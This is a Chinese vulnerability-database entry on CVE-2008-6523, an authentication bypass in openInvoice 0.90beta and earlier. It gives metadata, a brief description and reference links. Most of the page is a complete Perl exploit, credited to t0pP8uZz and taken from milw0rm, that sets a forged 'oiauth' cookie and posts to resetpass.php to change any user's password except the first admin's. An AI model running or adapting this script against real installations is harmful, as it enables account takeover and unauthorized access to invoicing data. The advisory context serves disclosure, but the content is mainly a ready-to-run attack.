openInvoice 'auth.php'身份认证授权绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115031 漏洞类型 授权问题
发布时间 2008-04-18 更新时间 2009-03-26
CVE编号 CVE-2008-6523 CNNVD-ID CNNVD-200903-402
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5466
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-402
|漏洞详情
openInvoice是一个发票管理小工具,可以根据格式要求定制和打印,并通过邮件自动发送给发票被开具者。openInvoice0.90beta版本及其早期版本的auth.php允许远程攻击者通过设置oiauthcookie,绕过权限并获得特权。注意:该漏洞可以与resetpass.php中的一个独立漏洞结合,更改任意用户的密码。
|漏洞EXP
#!/usr/bin/perl

# [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ]
# Discovered && Coded By t0pP8uZz
# Discovered On: 18 April 2008
# Vendor has not been notified!

# see exploit for more details..

# Greetz: milw0rm.com, h4ck-y0u.org, CipherCrew!

use strict;
use LWP::UserAgent;
use HTTP::Cookies;

print "-+- [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ] -+-\n";
print "-+-             (Discovered && Coded By t0pP8uZz)              -+-\n";
print "-+-                                                            -+-\n";
print "-+-   Discovered On: 18 April 2008 / Discovered By: t0pP8uZz   -+-\n";
print "-+- OpenInvoice 0.9 beta (and prior) Suffers from Insecure ... -+-\n";
print "-+- ...cookies and admin panel validating, combining the two.. -+-\n";
print "-+- .we can change any users password except for the 1st admin -+-\n";
print "-+-                                                            -+-\n";
print "-+- [ OpenInvoice 0.9 Arbitrary Change User Password Exploit ] -+-\n";

print "\nEnter URL (the vuln site): ";
	chomp(my $url=<STDIN>);
	
print "\nEnter UID (the user id to change pass for): ";
	chomp(my $uid=<STDIN>);
	
my $domain = $url;
my $count = ($domain =~ tr"/"");

if($count == 1) {
	$domain =~ s/\\//;
} elsif($count >= 3) {
	$domain =~ s/http:\/\///;
}

my $cjar = HTTP::Cookies->new( file => "cookies.txt", autosave => 1 );
$cjar->set_cookie(1, "oiauth", "1", "/", "6oogle.pl");
$cjar->save("cookies.txt");

my $ua     = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1 )', cookie_jar => $cjar );
my $result = $ua->post($url."/resetpass.php", { 'uid' => $uid, 'changepass' => 'Change Password' } );

if($result->is_success() && $result->content !~ /unable to change password/i && $uid != 1) {
	print "Password successfuly changed for userid: ".$uid."\n";
	exit;
}
print "Exploit Failed! check domain is running OpenInvoice <= 0.9, Check UID isnt 1\n";
exit;

# milw0rm.com [2008-04-18]
|参考资料

来源:XF
名称:openinvoice-cookie-security-bypass(41947)
链接:http://xforce.iss.net/xforce/xfdb/41947
来源:BID
名称:28854
链接:http://www.securityfocus.com/bid/28854
来源:MILW0RM
名称:5466
链接:http://www.milw0rm.com/exploits/5466